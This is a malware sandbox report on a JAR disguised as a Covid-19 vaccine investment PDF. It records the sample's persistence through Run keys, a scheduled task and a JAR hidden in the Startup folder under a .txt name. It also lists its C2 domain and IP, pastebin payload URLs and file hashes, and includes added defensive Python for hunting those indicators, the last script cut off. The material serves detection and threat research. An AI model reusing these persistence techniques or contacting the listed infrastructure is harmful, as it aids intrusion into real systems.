Sample file name: Covid19_Vacine_Investment_Proposals_1st_Quarter2021 pdf.jar
Cookbook file name: defaultwindowsfilecookbook.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name: Without Tracing
Number of new started processes analysed: 40
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal80.troj.expl.evad.winJAR@34/30@13/7
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .jar
Warnings:
                                                          • Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, svchost.exe
                                                          • TCP Packets have been reduced to 100
                                                          • Excluded IPs from analysis (whitelisted): 104.43.193.48, 184.30.21.144, 52.255.188.83, 13.64.90.137, 104.43.139.144, 23.210.248.85, 51.104.139.180, 205.185.216.10, 205.185.216.42, 20.54.26.129, 204.79.197.200, 13.107.21.200, 92.122.213.194, 92.122.213.247
                                                          • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, www-bing-com.dual-a-0001.a-msedge.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, cds.d2s7q6s2.hwcdn.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net
• Execution Graph export aborted for target java.exe, PID 5544 because it is empty
• Execution Graph export aborted for target java.exe, PID 6284 because there are no executed functions
• Execution Graph export aborted for target java.exe, PID 720 because there are no executed functions
• Execution Graph export aborted for target javaw.exe, PID 3164 because there are no executed functions
                                                          • Execution Graph export aborted for target javaw.exe, PID 4880 because it is empty
                                                          • Execution Graph export aborted for target javaw.exe, PID 6568 because it is empty
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size exceeded maximum capacity and may have missing network information.
                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                                          • Report size getting too big, too many NtWriteFile calls found.
                                                          • VT rate limit hit for: /opt/package/joesandbox/database/analysis/356987/sample/Covid19_Vacine_Investment_Proposals_1st_Quarter2021 pdf.jar

                                                          Simulations

                                                          Behavior and APIs

Time | Type | Description
21:04:36 | Task Scheduler | Run new task: Skype path: C:\Users\user\AppData\Roaming\vmlpusjwhz.txt
21:04:38 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run vmlpusjwhz "C:\Users\user\AppData\Roaming\vmlpusjwhz.txt"
21:04:46 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run vmlpusjwhz "C:\Users\user\AppData\Roaming\vmlpusjwhz.txt"
21:04:55 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run plugins "C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\plugins.jar" mp
21:05:03 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run vmlpusjwhz "C:\Users\user\AppData\Roaming\vmlpusjwhz.txt"
21:05:11 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run plugins "C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\plugins.jar" mp
21:05:19 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vmlpusjwhz.txt
21:05:33 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run plugins "C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\plugins.jar" mp

                                                          Joe Sandbox View / Context

                                                          IPs

Match | Associated Sample Name / URL | Detection | Context
104.23.99.190 | u6Wf8vCDUv.exe | malicious | pastebin.com/raw/BCAJ8TgJ
104.23.99.190 | Recept.exe | malicious | pastebin.com/raw/BCAJ8TgJ
104.23.99.190 | 7fYoHeaCBG.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.99.190 | r0QRptqiCl.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.99.190 | JDgYMW0LHW.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.99.190 | kigAlmMyB1.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.99.190 | 5T4Ykc0VSK.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.99.190 | afvhKak0Ir.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.99.190 | 1KITgJnGbI.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.99.190 | DovV3LuJ6I.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.99.190 | 66f8F6WvC1.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.99.190 | PxwWcmbMC5.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.99.190 | XnAJZR4NcN.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.99.190 | uqXsQvWMnL.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.99.190 | I8r7e1pqac.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.99.190 | VrR9J0FnSG.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.99.190 | dEpoPWHmoI.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.99.190 | zZp3oXclum.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.99.190 | aTZQZVVriQ.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.99.190 | U23peRXm5Z.exe | malicious | pastebin.com/raw/XMKKNkb0
23.239.31.129 | Covid19_Vacine_Investment_Proposals_1st_Quarter2021 pdf.jar | malicious |
23.239.31.129 | Invoice467972.jar | malicious |
23.239.31.129 | Invoice467972.jar | malicious |
23.239.31.129 | MT0128.jar | malicious |
23.239.31.129 | MT0128.jar | malicious |
23.239.31.129 | PO348578.jar | malicious |
23.239.31.129 | ShippingDoc.jar | malicious |
23.239.31.129 | 02_extracted.jar | malicious |
23.239.31.129 | https://protect-eu.mimecast.com/s/HPS1C6XWNSMg8gQup-dAS?domain=linkbuildingseohub.com/ | malicious |
23.239.31.129 | ntfsmgr.jar | malicious |
23.239.31.129 | Specification-037-31-08.jar | malicious |
23.239.31.129 | 04_extracted.jar | malicious |
23.239.31.129 | Order Quotation ....jar | malicious |
23.239.31.129 | tsts11.jar | malicious |
23.239.31.129 | Spec#-0537354-17-08.jar | malicious |
23.239.31.129 | Spec-10-8-20.jar | malicious |
23.239.31.129 | Payment Advice.jar | malicious |
23.239.31.129 | https://1drv.ms/u/s!AjkNQ7L0-bMSkmSt07fhRYHCFhZm?e=136OWp | malicious |
23.239.31.129 | SCANPAGO.jar | malicious |
23.239.31.129 | Naukri Alert Mailer.jar | malicious |

                                                                                                  Domains

Match | Associated Sample Name / URL | Detection | Context
github.com | Covid19_Vacine_Investment_Proposals_1st_Quarter2021 pdf.jar | malicious | 140.82.121.3
github.com | TxvR Order.exe | malicious | 140.82.121.4
github.com | 5293ea9467ea45e928620a5ed74440f5.exe | malicious | 140.82.121.4
github.com | Unterlagen PDF.exe | malicious | 140.82.121.3
github.com | rufus-3.13.exe | malicious | 140.82.121.4
github.com | f1a14e6352036833f1c109e1bb2934f2.exe | malicious | 140.82.121.4
github.com | d88e07467ddcf9e3b19fa972b9f000d1.exe | malicious | 140.82.121.3
github.com | Invoice467972.jar | malicious | 140.82.121.4
github.com | Invoice467972.jar | malicious | 140.82.121.4
github.com | password.doc | malicious | 140.82.121.4
github.com | password.doc | malicious | 140.82.121.3
github.com | Pastebin.docm | malicious | 140.82.121.4
github.com | password.doc | malicious | 140.82.121.4
github.com | Pastebin.docm | malicious | 140.82.121.4
github.com | Pastebin.docm | malicious | 140.82.121.3
github.com | index_2021-02-18-00_38.exe | malicious | 140.82.121.3
github.com | 571e42f6394e3fe9d63239315df13631.exe | malicious | 140.82.121.4
github.com | executable.908.exe | malicious | 140.82.121.4
github.com | executable.908.exe | malicious | 140.82.121.4
github.com | executable.908.exe | malicious | 140.82.121.3
sonatype.map.fastly.net | Covid19_Vacine_Investment_Proposals_1st_Quarter2021 pdf.jar | malicious | 199.232.192.209
sonatype.map.fastly.net | Invoice467972.jar | malicious | 199.232.192.209
sonatype.map.fastly.net | Invoice467972.jar | malicious | 199.232.192.209
sonatype.map.fastly.net | MT0128.jar | malicious | 199.232.192.209
sonatype.map.fastly.net | MT0128.jar | malicious | 199.232.192.209
sonatype.map.fastly.net | PO348578.jar | malicious | 199.232.192.209
sonatype.map.fastly.net | ShippingDoc.jar | malicious | 199.232.192.209
sonatype.map.fastly.net | 02_extracted.jar | malicious | 199.232.192.209
sonatype.map.fastly.net | https://protect-eu.mimecast.com/s/HPS1C6XWNSMg8gQup-dAS?domain=linkbuildingseohub.com/ | malicious | 199.232.192.209
sonatype.map.fastly.net | ntfsmgr.jar | malicious | 199.232.192.209
sonatype.map.fastly.net | Specification-037-31-08.jar | malicious | 151.101.12.209
sonatype.map.fastly.net | 04_extracted.jar | malicious | 151.101.112.209
sonatype.map.fastly.net | Order Quotation ....jar | malicious | 151.101.112.209
sonatype.map.fastly.net | Order Quotation ....jar | malicious | 151.101.12.209
sonatype.map.fastly.net | tsts11.jar | malicious | 151.101.112.209
                                                                                                  tsts11.jarGet hashmaliciousBrowse
                                                                                                  • 151.101.112.209
                                                                                                  Spec#-0537354-17-08.jarGet hashmaliciousBrowse
                                                                                                  • 151.101.112.209
                                                                                                  Spec#-0537354-17-08.jarGet hashmaliciousBrowse
                                                                                                  • 151.101.112.209
                                                                                                  Spec-10-8-20.jarGet hashmaliciousBrowse
                                                                                                  • 151.101.112.209
                                                                                                  Spec-10-8-20.jarGet hashmaliciousBrowse
                                                                                                  • 151.101.112.209
                                                                                                  pluginserver.duckdns.orgInvoice467972.jarGet hashmaliciousBrowse
                                                                                                  • 23.239.31.129
                                                                                                  Invoice467972.jarGet hashmaliciousBrowse
                                                                                                  • 23.239.31.129
                                                                                                  MT0128.jarGet hashmaliciousBrowse
                                                                                                  • 23.239.31.129
                                                                                                  MT0128.jarGet hashmaliciousBrowse
                                                                                                  • 23.239.31.129
                                                                                                  PO348578.jarGet hashmaliciousBrowse
                                                                                                  • 23.239.31.129
                                                                                                  ShippingDoc.jarGet hashmaliciousBrowse
                                                                                                  • 23.239.31.129
                                                                                                  02_extracted.jarGet hashmaliciousBrowse
                                                                                                  • 23.239.31.129
                                                                                                  https://protect-eu.mimecast.com/s/HPS1C6XWNSMg8gQup-dAS?domain=linkbuildingseohub.com/Get hashmaliciousBrowse
                                                                                                  • 23.239.31.129
                                                                                                  ntfsmgr.jarGet hashmaliciousBrowse
                                                                                                  • 23.239.31.129
                                                                                                  Specification-037-31-08.jarGet hashmaliciousBrowse
                                                                                                  • 23.239.31.129
                                                                                                  04_extracted.jarGet hashmaliciousBrowse
                                                                                                  • 23.239.31.129
                                                                                                  Order Quotation ....jarGet hashmaliciousBrowse
                                                                                                  • 23.239.31.129
                                                                                                  tsts11.jarGet hashmaliciousBrowse
                                                                                                  • 23.239.31.129
                                                                                                  Spec#-0537354-17-08.jarGet hashmaliciousBrowse
                                                                                                  • 23.239.31.129
                                                                                                  Spec-10-8-20.jarGet hashmaliciousBrowse
                                                                                                  • 23.239.31.129
                                                                                                  Payment Advice.jarGet hashmaliciousBrowse
                                                                                                  • 23.239.31.129
                                                                                                  https://1drv.ms/u/s!AjkNQ7L0-bMSkmSt07fhRYHCFhZm?e=136OWpGet hashmaliciousBrowse
                                                                                                  • 23.239.31.129

ASN

Match | Associated Sample Name / URL | Detection | Context (IPs)
FASTLY, US | TDCS.dll | malicious | 151.101.1.44
FASTLY, US | Covid19_Vacine_Investment_Proposals_1st_Quarter2021 pdf.jar | malicious | 185.199.110.154
FASTLY, US | Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | malicious | 185.199.108.153
FASTLY, US | TxvR Order.exe | malicious | 185.199.108.133
FASTLY, US | b0PmDaDeNh.dll | malicious | 151.101.1.44
FASTLY, US | SecuriteInfo.com.Mal.Generic-S.15142.exe | malicious | 185.199.108.133
FASTLY, US | LIQUIDACION INTERBANCARIA 02_22_2021.xls | malicious | 185.199.108.133
FASTLY, US | muOvK6dngg.exe | malicious | 185.199.108.133
FASTLY, US | rieuro.dll | malicious | 151.101.1.44
FASTLY, US | 7lM8HxwfAm.dll | malicious | 151.101.1.44
FASTLY, US | LcA7GaqAXC.dll | malicious | 151.101.1.44
FASTLY, US | 4FHOFKHnX8.dll | malicious | 151.101.1.44
FASTLY, US | 5N5yxttthP.dll | malicious | 151.101.1.44
FASTLY, US | vBKmtJ58Eo.dll | malicious | 151.101.1.44
FASTLY, US | Vessel Line Up 7105082938.exe | malicious | 185.199.110.133
FASTLY, US | 5293ea9467ea45e928620a5ed74440f5.exe | malicious | 185.199.108.133
FASTLY, US | Unterlagen PDF.exe | malicious | 185.199.108.133
FASTLY, US | rufus-3.13.exe | malicious | 185.199.111.153
FASTLY, US | f1a14e6352036833f1c109e1bb2934f2.exe | malicious | 185.199.108.133
LINODE-AP Linode LLC, US | Covid19_Vacine_Investment_Proposals_1st_Quarter2021 pdf.jar | malicious | 23.239.31.129
LINODE-AP Linode LLC, US | MV9tCJw8Xr.exe | malicious | 172.105.78.244
LINODE-AP Linode LLC, US | File_72309.xlsb | malicious | 172.105.70.225
LINODE-AP Linode LLC, US | SecuriteInfo.com.Heur.15528.xls | malicious | 139.162.8.120
LINODE-AP Linode LLC, US | SecuriteInfo.com.Heur.15528.xls | malicious | 139.162.8.120
LINODE-AP Linode LLC, US | Drawings2.exe | malicious | 45.56.79.23
LINODE-AP Linode LLC, US | Sign-1870635479_637332644.xls | malicious | 176.58.123.25
LINODE-AP Linode LLC, US | SecuriteInfo.com.Exploit.Siggen3.10350.26515.xls | malicious | 176.58.123.25
LINODE-AP Linode LLC, US | SecuriteInfo.com.Heur.1476.xls | malicious | 176.58.123.25
LINODE-AP Linode LLC, US | Sign-92793351_1597657581.xls | malicious | 176.58.123.25
LINODE-AP Linode LLC, US | Invoice467972.jar | malicious | 23.239.31.129
LINODE-AP Linode LLC, US | Invoice467972.jar | malicious | 23.239.31.129
LINODE-AP Linode LLC, US | SecuriteInfo.com.Heur.22173.xls | malicious | 176.58.123.25
LINODE-AP Linode LLC, US | Deposit_50%PAYMENT TERM -PO09-excel.htm | malicious | 45.79.77.20
LINODE-AP Linode LLC, US | Sign_1229872171-1113140666(1).xls | malicious | 176.58.123.25
LINODE-AP Linode LLC, US | IU-8549 Medical report COVID-19.doc | malicious | 172.104.97.173
LINODE-AP Linode LLC, US | SecuriteInfo.com.Exploit.Siggen3.10048.24657.xls | malicious | 176.58.123.25
LINODE-AP Linode LLC, US | SecuriteInfo.com.Exploit.Siggen3.10048.15397.xls | malicious | 176.58.123.25
LINODE-AP Linode LLC, US | Invoice#6026115.xls | malicious | 172.104.247.192
LINODE-AP Linode LLC, US | index_2021-02-17-11_45.dll | malicious | 176.58.123.25
CLOUDFLARENET, US | Attach_1344833645_1944784007.xls | malicious | 172.67.9.138
CLOUDFLARENET, US | TDCS.dll | malicious | 104.20.185.68
CLOUDFLARENET, US | Covid19_Vacine_Investment_Proposals_1st_Quarter2021 pdf.jar | malicious | 104.23.98.190
CLOUDFLARENET, US | Fs7U7nti7y.exe | malicious | 104.23.98.190
CLOUDFLARENET, US | vB1Zux02Zf.exe | malicious | 104.21.1.113
CLOUDFLARENET, US | Vrxs6evJO7.exe | malicious | 104.21.71.230
CLOUDFLARENET, US | 17UjjiZ5PH.exe | malicious | 104.23.98.190
CLOUDFLARENET, US | rODTO7r2NU.exe | malicious | 172.67.188.154
CLOUDFLARENET, US | Property Files.exe | malicious | 104.21.71.230
CLOUDFLARENET, US | IMG_0352_Scanned.exe | malicious | 172.67.188.154
CLOUDFLARENET, US | purchase order.exe | malicious | 172.67.188.154
CLOUDFLARENET, US | purchase order.exe | malicious | 104.21.19.200
CLOUDFLARENET, US | PRODUCTS ENQUIRY.exe | malicious | 172.67.188.154
CLOUDFLARENET, US | Message Body Content.exe | malicious | 104.21.19.200
CLOUDFLARENET, US | 2021223#.exe | malicious | 172.67.188.154
CLOUDFLARENET, US | #U041e#U0440#U0434#U0435#U043d Alphagrissin.exe | malicious | 104.21.19.200
CLOUDFLARENET, US | Consignment Invoice PL&BL Draft.exe | malicious | 104.21.19.200
CLOUDFLARENET, US | TT copy.exe | malicious | 172.67.188.154
CLOUDFLARENET, US | Attached FILE.exe | malicious | 162.159.135.233
CLOUDFLARENET, US | WaybillDoc_2396752890.pdf.exe | malicious | 104.21.19.200
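The domain, IP and ASN context above is only useful for hunting if the two kinds of infrastructure it mixes are kept apart. The dynamic-DNS name pluginserver.duckdns.org and the Linode address 23.239.31.129 it resolves to recur only across the related .jar samples, so they are dedicated C2 and worth an alert on their own. The Fastly, GitHub Pages (filed under FASTLY here) and Cloudflare addresses also recur across unrelated samples because they are shared CDN and hosting infrastructure, so a hit on one of them means nothing unless the same host also touched a dedicated indicator. The following Python is an added example, not part of this Joe Sandbox report, that applies that distinction to Zeek-style JSON dns.log and conn.log records. The log records are constructed for illustration, the destination port in the C2 connection is arbitrary, and the list of dynamic-DNS suffixes is an assumption to be extended locally.

```python
"""Pivot on the Domains / IPs and ASN context from the report: flag Zeek-style
JSON dns.log and conn.log records, weighting shared CDN infrastructure lower
than the dedicated C2. Added example; the log records below are constructed."""
import json
from collections import Counter

# Indicators lifted from the context tables.
C2_DOMAINS = {"pluginserver.duckdns.org"}   # dynamic-DNS C2 name
C2_IPS = {"23.239.31.129"}                  # LINODE-AP address the C2 name resolves to
# Addresses the tables tie to this sample but also to unrelated samples
# (Fastly, GitHub Pages, Cloudflare): shared infrastructure, low signal alone.
SHARED_IPS = {
    "199.232.192.209", "151.101.12.209", "151.101.112.209", "151.101.1.44",
    "185.199.110.154", "185.199.108.154", "185.199.108.133", "104.23.98.190",
    "104.23.99.190", "172.67.188.154", "140.82.121.3",
}
DYNDNS_SUFFIXES = (".duckdns.org",)         # assumed list; extend with other providers

HIGH, MEDIUM, LOW = "high", "medium", "low"


def score_dns(rec):
    """Return (confidence, reason) for one dns.log record, or None if clean."""
    q = rec.get("query", "").lower().rstrip(".")
    answers = set(rec.get("answers", []))
    if q in C2_DOMAINS or answers & C2_IPS:
        return HIGH, f"dns query {q} -> {sorted(answers)} matches C2 context"
    if q.endswith(DYNDNS_SUFFIXES):
        # Any dynamic-DNS lookup from a workstation deserves a second look,
        # but it is not this C2, so rank it below a direct indicator hit.
        return MEDIUM, f"dns query to dynamic-DNS host {q}"
    return None


def score_conn(rec):
    """Return (confidence, reason) for one conn.log record, or None if clean."""
    dst, port = rec.get("id.resp_h"), rec.get("id.resp_p")
    if dst in C2_IPS:
        return HIGH, f"connection to C2 address {dst}:{port}"
    if dst in SHARED_IPS:
        # Fastly / GitHub / Cloudflare also serve legitimate traffic; only
        # interesting alongside a higher-confidence hit from the same host.
        return LOW, f"connection to shared CDN/hosting address {dst}:{port}"
    return None


def hunt(dns_lines, conn_lines):
    """Group hits per source host. A host with a HIGH hit is reported with its
    LOW hits attached, so the CDN traffic reads as part of the same chain
    (jar download, paste lookup) instead of as a stand-alone alert. Hosts with
    only LOW hits are dropped as noise."""
    findings = {}
    for line in dns_lines:
        rec = json.loads(line)
        if hit := score_dns(rec):
            findings.setdefault(rec["id.orig_h"], []).append(hit)
    for line in conn_lines:
        rec = json.loads(line)
        if hit := score_conn(rec):
            findings.setdefault(rec["id.orig_h"], []).append(hit)
    report = {}
    for host, hits in findings.items():
        levels = Counter(level for level, _ in hits)
        if levels[HIGH]:
            report[host] = ("alert", hits)
        elif levels[MEDIUM]:
            report[host] = ("review", hits)
    return report


# Constructed sample records (Zeek JSON output, trimmed to the fields used).
DNS_LOG = [
    '{"ts":1614000000.1,"id.orig_h":"10.0.0.5","query":"sonatype.map.fastly.net","answers":["199.232.192.209"]}',
    '{"ts":1614000001.2,"id.orig_h":"10.0.0.5","query":"pluginserver.duckdns.org","answers":["23.239.31.129"]}',
    '{"ts":1614000002.0,"id.orig_h":"10.0.0.9","query":"update.example.duckdns.org","answers":["203.0.113.7"]}',
    '{"ts":1614000003.4,"id.orig_h":"10.0.0.12","query":"github.com","answers":["140.82.121.3"]}',
]
CONN_LOG = [
    '{"ts":1614000000.3,"id.orig_h":"10.0.0.5","id.resp_h":"199.232.192.209","id.resp_p":443}',
    '{"ts":1614000001.5,"id.orig_h":"10.0.0.5","id.resp_h":"23.239.31.129","id.resp_p":4443}',
    '{"ts":1614000003.6,"id.orig_h":"10.0.0.12","id.resp_h":"140.82.121.3","id.resp_p":443}',
]

if __name__ == "__main__":
    for host, (verdict, hits) in hunt(DNS_LOG, CONN_LOG).items():
        print(f"{host}: {verdict}")
        for level, reason in hits:
            print(f"  [{level}] {reason}")
```

Run against the constructed records, 10.0.0.5 is reported as an alert (C2 lookup and C2 connection, with its Fastly fetch attached as context), 10.0.0.9 is queued for review because of an unrelated dynamic-DNS lookup, and 10.0.0.12 is dropped because its only contact was a GitHub address that the tables also show for unrelated samples.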

JA3 Fingerprints

Match | Associated Sample Name / URL | Detection | Context (IPs)
d2935c58fe676744fecc8614ee5356c7 | Covid19_Vacine_Investment_Proposals_1st_Quarter2021 pdf.jar | malicious | 199.232.192.209, 104.23.99.190, 185.199.108.154, 140.82.121.3
d2935c58fe676744fecc8614ee5356c7 | Invoice467972.jar | malicious | 199.232.192.209, 104.23.99.190, 185.199.108.154, 140.82.121.3
d2935c58fe676744fecc8614ee5356c7 | Invoice467972.jar | malicious | 199.232.192.209, 104.23.99.190, 185.199.108.154, 140.82.121.3
d2935c58fe676744fecc8614ee5356c7 | MT0128.jar | malicious | 199.232.192.209, 104.23.99.190, 185.199.108.154, 140.82.121.3
d2935c58fe676744fecc8614ee5356c7 | MT0128.jar | malicious | 199.232.192.209, 104.23.99.190, 185.199.108.154, 140.82.121.3
d2935c58fe676744fecc8614ee5356c7 | PO348578.jar | malicious | 199.232.192.209, 104.23.99.190, 185.199.108.154, 140.82.121.3
d2935c58fe676744fecc8614ee5356c7 | APJoWYdmQc.jar | malicious | 199.232.192.209, 104.23.99.190, 185.199.108.154, 140.82.121.3
d2935c58fe676744fecc8614ee5356c7 | ShippingDoc.jar | malicious | 199.232.192.209, 104.23.99.190, 185.199.108.154, 140.82.121.3
d2935c58fe676744fecc8614ee5356c7 | ORGINV687400321566.jar | malicious | 199.232.192.209, 104.23.99.190, 185.199.108.154, 140.82.121.3
d2935c58fe676744fecc8614ee5356c7 | 02_extracted.jar | malicious | 199.232.192.209, 104.23.99.190, 185.199.108.154, 140.82.121.3
d2935c58fe676744fecc8614ee5356c7 | https://protect-eu.mimecast.com/s/HPS1C6XWNSMg8gQup-dAS?domain=linkbuildingseohub.com/ | malicious | 199.232.192.209, 104.23.99.190, 185.199.108.154, 140.82.121.3
d2935c58fe676744fecc8614ee5356c7 | meWMpiDNKM.jar | malicious | 199.232.192.209, 104.23.99.190, 185.199.108.154, 140.82.121.3
d2935c58fe676744fecc8614ee5356c7 | list of equipment.jar | malicious | 199.232.192.209, 104.23.99.190, 185.199.108.154, 140.82.121.3
d2935c58fe676744fecc8614ee5356c7 | ntfsmgr.jar | malicious | 199.232.192.209, 104.23.99.190, 185.199.108.154, 140.82.121.3
d2935c58fe676744fecc8614ee5356c7 | Specification-037-31-08.jar | malicious | 199.232.192.209, 104.23.99.190, 185.199.108.154, 140.82.121.3
d2935c58fe676744fecc8614ee5356c7 | 04_extracted.jar | malicious | 199.232.192.209, 104.23.99.190, 185.199.108.154, 140.82.121.3
d2935c58fe676744fecc8614ee5356c7 | Order Quotation ....jar | malicious | 199.232.192.209, 104.23.99.190, 185.199.108.154
                                                                                                  • 140.82.121.3
                                                                                                  Order Quotation ....jarGet hashmaliciousBrowse
                                                                                                  • 199.232.192.209
                                                                                                  • 104.23.99.190
                                                                                                  • 185.199.108.154
                                                                                                  • 140.82.121.3
                                                                                                  tsts11.jarGet hashmaliciousBrowse
                                                                                                  • 199.232.192.209
                                                                                                  • 104.23.99.190
                                                                                                  • 185.199.108.154
                                                                                                  • 140.82.121.3
                                                                                                  tsts11.jarGet hashmaliciousBrowse
                                                                                                  • 199.232.192.209
                                                                                                  • 104.23.99.190
                                                                                                  • 185.199.108.154
                                                                                                  • 140.82.121.3

Dropped Files

Match: C:\Users\user\AppData\Local\Temp\jna-99048687\jna6181350368483245817.dll
Associated sample name / URL (detection):
• Covid19_Vacine_Investment_Proposals_1st_Quarter2021 pdf.jar (malicious)
• Invoice467972.jar (malicious)
• Invoice467972.jar (malicious)
• MT0128.jar (malicious)
• MT0128.jar (malicious)
• PO348578.jar (malicious)
• ShippingDoc.jar (malicious)
• 02_extracted.jar (malicious)
• https://protect-eu.mimecast.com/s/HPS1C6XWNSMg8gQup-dAS?domain=linkbuildingseohub.com/ (malicious)
• ntfsmgr.jar (malicious)
• Specification-037-31-08.jar (malicious)
• 04_extracted.jar (malicious)
• Order Quotation ....jar (malicious)
• tsts11.jar (malicious)
• Spec#-0537354-17-08.jar (malicious)
• Spec-10-8-20.jar (malicious)
• Payment Advice.jar (malicious)
• https://1drv.ms/u/s!AjkNQ7L0-bMSkmSt07fhRYHCFhZm?e=136OWp (malicious)
• ORDER SPECIFICATIONS.jar (malicious)
• SCANPAGO.jar (malicious)

Created / dropped Files

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vmlpusjwhz.txt
Process: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
File Type: Zip archive data, at least v2.0 to extract
Category: dropped
Size (bytes): 93302
Entropy (8bit): 7.907636664666169
Encrypted: false
SSDEEP: 1536:/1qTnJjXcA/88jc5w+e6saZGIhw8c+/MCZdCa9aQ7IakSyEvaogK0imdgIJX0H:dqTNV9+wdDaZn9/MCZdN7RkSy0ajA+JA
MD5: 6A1EFB0C410A7790DBC75FD29ADC48D6
SHA1: 5589EAD30D23C96DC8AE7BA03D03066BCB1B17EF
SHA-256: DFC703A9B8498AA24306908FCE67CBF894C7861E07FF778E3FD62315684B579B
SHA-512: 7C331441848875875DF4F39E7AF59C040C0EDD010666894C69178064EB52E1A3E310BBF62A35FDF1B2F6EE372B68D75AE395E9EC92ECFFB150EF2B5C5570205F
Malicious: false
Preview: PK..........WR................META-INF/MANIFEST.MF].=O.0.EwK..o,.M\ZQyk#6B..b}._..'..+.......w....p...E.R.>N..l8;N..qF..TV.T.......E.v'..0J.....6.9&,5|.Y.~.m..5XL.8.(WXkV*.....7.y.F......^....0....C.........#.Bbp.....[.V..h.].....g.|.....s...%.u....0..>8.8..PK...&......-...PK..........WR................carLambo/resources/config.txt.... ....r.h..h..=.._i.LG.........1..KK..kRo..h...L.t[.06...u..4....y.....3>.H29.jql^e}..5..A[i....t.p.5.......#t.@..`..M..e.-.:T?n...mF.._..G..6.D\.r.AZ/.. .Hq.....{../....mQ..)}../...PK..)!..........PK..........WR................carLambo/sbsgssdfg.class.Xy|.W........XJ..P .f.@....$..I.B.]b..;{.f..L(H.T.....U.Gl...]..W....>Zo..=.Z.....fg........}....x.w..v......h.......b%.....@...R+..B.;%.K.%.G.{%.O..%.$..0".!..K....J....I...GE|I..D<&.."~(.G"~,.'"~*.g"~..."~).W"...l!.E.!..e.1lg.g..a..~.73....o+.\....n..U.!...od..p3...:p.3_...W ...lu............a...!.p#.-......2.....;.......b.j...jq...).A../......e8..#x../..'...0|..b.o.CN<.O..I
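
The file dropped into the Startup folder above is a Zip archive (the META-INF/MANIFEST.MF and carLambo/ class entries in the preview mark it as a JAR) saved under a .txt name, so a listing by extension misses it while the file association of javaw.exe on the JAR still lets it run at logon. The Python check below is an added example, not part of the Joe Sandbox report: it walks the two Startup directories the report names, flags any file that starts with the Zip local-header magic but does not carry an archive extension, lists the archive entries and compares the SHA-256 with the value reported for vmlpusjwhz.txt. The build_fixture() sample is constructed so the script runs offline; the hash comparison against REPORT_SHA256 uses the digest from the entry above. The jna-*\jna*.dll files in %TEMP% follow the naming Java Native Access uses when it extracts its native library at runtime, which fits their low AV detection, so they are left out of this check.

```python
"""Find Zip/JAR archives hiding in Windows Startup folders under a non-archive extension.

Added example (not from the Joe Sandbox report). build_fixture() is a constructed
sample; REPORT_SHA256 is the SHA-256 the report lists for vmlpusjwhz.txt.
"""
import hashlib
import os
import tempfile
import zipfile
from pathlib import Path

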